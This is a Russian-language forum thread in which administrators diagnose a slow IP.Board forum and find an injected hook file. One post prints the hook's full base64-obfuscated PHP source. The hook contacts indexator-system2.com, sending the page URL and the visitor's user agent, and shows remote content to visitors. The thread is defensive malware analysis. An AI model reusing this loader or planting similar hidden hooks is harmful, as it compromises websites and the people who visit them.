Медленная работа форума

[tj.anton]

День добрый. Форум стал медленно работать и открывать страницы, никакой доп софт, куки не ставили, конфигурацию на сервере не меняли... После многократных обновлений страницы вылазиет ошибка nginx, в логах
 

 

2013/09/07 18:03:26 [error] 1983#0: *22924 upstream timed out (60: Operation timed out) while reading response header from upstream, client: 109.191.39.225, server: forum.skat-satka.ru, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8080/", host: "forum.**************.ru", referrer: "http://*******.ru/index.php?/members/"

 

 

что может быть?!

UPD: На мобильной версии все ок, в админ-центре все ок - быстро работает

 

Как меняешь на базовый стиль все тормозит, что может быть!?

[mokys]

В пятницу у меня случилась такая же беда. форум грузился еле еле изредка выдавая 504

 

Вот что мы видим:

Идет запрос данных с хоста indexator-system2.com

 connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("82.192.71.8")}, 16) = -1 EINPROGRESS (Operation now in progress)
 poll([{fd=4, events=POLLIN|POLLOUT|POLLERR|POLLHUP}], 1, 60000) = 1 ([{fd=4, revents=POLLOUT}])
 getsockopt(4, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
 fcntl(4, F_SETFL, O_RDWR) = 0
 sendto(4, "GET /get.php?d=index.php&u=&c=u&"..., 81, MSG_DONTWAIT, NULL, 0) = 81
 sendto(4, "Host: indexator-system2.com\r\n", 29, MSG_DONTWAIT, NULL, 0) = 29
 sendto(4, "\r\n", 2, MSG_DONTWAIT, NULL, 0) = 2
 poll([{fd=4, events=POLLIN|POLLPRI|POLLERR|POLLHUP}], 1, 0) = 0 (Timeout)
 poll([{fd=4, events=POLLIN|POLLERR|POLLHUP}], 1, 60000

/***/***hooks/boardIndexLastMessages_87b57629b55978b0cd7f48f5cb62eff5.php Удалить. Предварительно сделать копию папки hooks. Код зашифрован в base64_decode. Надеюсь эта процедура вам помогла, в любом случае отпишитесь.

 

Версия движка 3.4.5.

[Denis Chursinov]

Не знаю, оно ли у ТСа, но нашел такую штуку на паре форумов. boardIndexLastMessages c обфусцированным содержимым. Похоже на начало волны типа ноябрьской.

[mokys]

Сам офигел, везде все дыры закрывал и последние обновления ставил всегда, причем ни одного хука кроме стандартных на форуме не стоит. Вообщем чую новая фишка.

 

Может это IPS перед выпуском форума версии 4 пытается всех 3.4Х форумы утопить))) Чтоб обновлялись и продлевали лицензии)))) Шуткую конечно, но факт остается фактом.

[Denis Chursinov]

Там же рядом бывает еще один хук, только я его удалил и название забыл. Они прописаны по всем правилам, как-будто их ставил админ. В названии хука прописано на JS скрытие строчки. Т.е. они везде есть как обычные хуки, но в админке при отображении скрываются скриптом. Удалить файл мало, нужно еще вычистить из hooks_files, там же и название второго видно, они подряд и с одинаковым JS в названии. Я поймал на 3.1 , на 3.4 пока не видел. Чую дырка в процедуре установки хуков, либо они прицеплены к какому-то другому хуку/приложению. Пока инфы мало, найду еще случаи, изучу более подробно.

Изменено 9 Сентября 2013 пользователем Denis Chursinov

[mokys]

Содержимое того файлика

<?php
class boardIndexLastMessages
{
	public function getOutput()
	{
		$GLOBALS['_361518149_']=Array(base64_decode('' .'ZXJyb3JfcmVw' .'b' .'3J0aW5n'),base64_decode('aW5pX3N' .'ldA=='),base64_decode('c2' .'9' .'ja2V' .'0X2' .'NyZWF0Z' .'Q=' .'='),base64_decode('bXR' .'fcmF' .'uZA=' .'='),base64_decode('cHJlZ19tYXRjaA=='),base64_decode('Zmls' .'ZV9nZXR' .'f' .'Y' .'29udGVud' .'HM' .'='),base64_decode('dXJ' .'sZW5jb2' .'Rl'),base64_decode('d' .'XJsZW5j' .'b' .'2R' .'l'),base64_decode('bW' .'Q' .'1'),base64_decode('a' .'W5pX2dldA=='),base64_decode('' .'Z' .'mls' .'ZV9nZ' .'X' .'RfY29udGVu' .'dH' .'M='),base64_decode('ZnV' .'uY3R' .'pb2' .'5' .'fZXhpc3' .'Rz'),base64_decode('' .'Y' .'3Vy' .'b' .'F' .'9pb' .'ml' .'0'),base64_decode('Y' .'3VybF' .'9zZXRvcHQ='),base64_decode('' .'cHJlZ19t' .'YXRjaF9hb' .'Gw' .'='),base64_decode('' .'Y3VybF' .'9zZXRvcHQ' .'='),base64_decode('' .'Y3VybF9leG' .'V' .'j'),base64_decode('aW1hZ2Vjb3B' .'5bWVy' .'Z2Vnc' .'mF5'),base64_decode('c' .'3RycGJyaw=='),base64_decode('Y3V' .'ybF9jbG9' .'zZQ=='),base64_decode('bXRf' .'c' .'mFu' .'ZA' .'=='),base64_decode('dXJsZGVjb' .'2Rl'),base64_decode('' .'c3R' .'yaXBzbG' .'F' .'zaGVz'));  function _1339991759($i){$a=Array('ZG' .'lz' .'cGxheV9l' .'cnJv' .'cnM=','MA=' .'=','Y' .'2xpZW50X2' .'NoZWNr','Y2' .'xpZW50X2N' .'o' .'ZW' .'Nr','IVxTIXU=','' .'U0N' .'SSVBUX0ZJTEVOQU' .'1F','dQ==','dw' .'==','' .'U0VSVkVS' .'X05BTUU=','UkVRVUV' .'TVF9VUkk=','SF' .'R' .'UUF9VU' .'0VSX0FHRU5U','' .'a' .'H' .'R' .'0cDovL' .'2luZGV4YX' .'Rvci1zeX' .'N' .'0ZW' .'0yL' .'mNvbS9nZX' .'QucGhwP2Q9','Jn' .'U9','JmM9','' .'J' .'m' .'k9MSZoP' .'Q' .'=' .'=','O' .'Dkw' .'YTY' .'wZ' .'G' .'ZiZ' .'Tk5' .'Mj' .'Y4MjQ4YzdhZ' .'TEw' .'NWRi' .'ZDA0Y' .'TU=','M' .'Q==','YWx' .'sb3df' .'d' .'X' .'JsX' .'2Zv' .'cGVu','Y3' .'VybF9' .'pbm' .'l' .'0','' .'dWto','cA==','YmUxYW' .'ZmMTQ=');return base64_decode($a[$i]);}  $GLOBALS['_361518149_'][0](round(0));$GLOBALS['_361518149_'][1](_1339991759(0),_1339991759(1));(round(0+288.2+288.2+288.2+288.2+288.2)-round(0+720.5+720.5)+round(0+3514)-round(0+3514))?$GLOBALS['_361518149_'][2]($e2c9_0,$e2c9_1):$GLOBALS['_361518149_'][3](round(0+615+615),round(0+1441));if(!empty($_COOKIE[_1339991759(2)]))die($_COOKIE[_1339991759(3)]);if($GLOBALS['_361518149_'][4](_1339991759(4),$GLOBALS['_361518149_'][5]($_SERVER[_1339991759(5)])))$e2c9_1=_1339991759(6);else $e2c9_1=_1339991759(7);$e2c9_2=$_SERVER[_1339991759(8)] .$_SERVER[_1339991759(9)];$e2c9_3=$_SERVER[_1339991759(10)];$e2c9_4=_1339991759(11) .$GLOBALS['_361518149_'][6]($e2c9_2) ._1339991759(12) .$GLOBALS['_361518149_'][7]($e2c9_3) ._1339991759(13) .$e2c9_1 ._1339991759(14) .$GLOBALS['_361518149_'][8](_1339991759(15) .$e2c9_2 .$e2c9_3 .$e2c9_1 ._1339991759(16));if($GLOBALS['_361518149_'][9](_1339991759(17))== round(0+1)){return $GLOBALS['_361518149_'][10]($e2c9_4);}elseif($GLOBALS['_361518149_'][11](_1339991759(18))){$e2c9_5=$GLOBALS['_361518149_'][12]($e2c9_4);$GLOBALS['_361518149_'][13]($e2c9_5,42,FALSE);while(round(0+530.4+530.4+530.4+530.4+530.4)-round(0+530.4+530.4+530.4+530.4+530.4))$GLOBALS['_361518149_'][14]($e2c9_5,$e2c9_0);$GLOBALS['_361518149_'][15]($e2c9_5,19913,TRUE);$e2c9_0=$GLOBALS['_361518149_'][16]($e2c9_5);if((round(0+707.33333333333+707.33333333333+707.33333333333)^round(0+424.4+424.4+424.4+424.4+424.4))&& $GLOBALS['_361518149_'][17]($e2c9_5,$e2c9_5))$GLOBALS['_361518149_'][18]($_REQUEST,$_COOKIE,$e2c9_5,$_COOKIE);$GLOBALS['_361518149_'][19]($e2c9_5);$e2c9_6=_1339991759(19);return $e2c9_0;if(round(0+2003+2003)<$GLOBALS['_361518149_'][20](round(0+122.4+122.4+122.4+122.4+122.4),round(0+3389)))$GLOBALS['_361518149_'][21]($e2c9_1);} return '';
	}
}

Дата файлика была кстати 26.06, хотя залит явно в сентябре.

[Denis Chursinov]

После расшифровки видно, что гадость лезет на 

'http://indexator-system2.com/get.php?d=' .urlencode($_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']) .'&u='.urlencode($_SERVER['HTTP_USER_AGENT']) .'&c=u&i=1&h=
' .md5('890a60dfbe99268248c7ae105dbd04a5' .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']) .$_SERVER['HTTP_USER_AGENT'] .'u1'

 скачивает что-то и показывает юзеру в своем хукпоинте

[t0rik]

просто забанил в файрволе indexator-system2.com и все работает нормально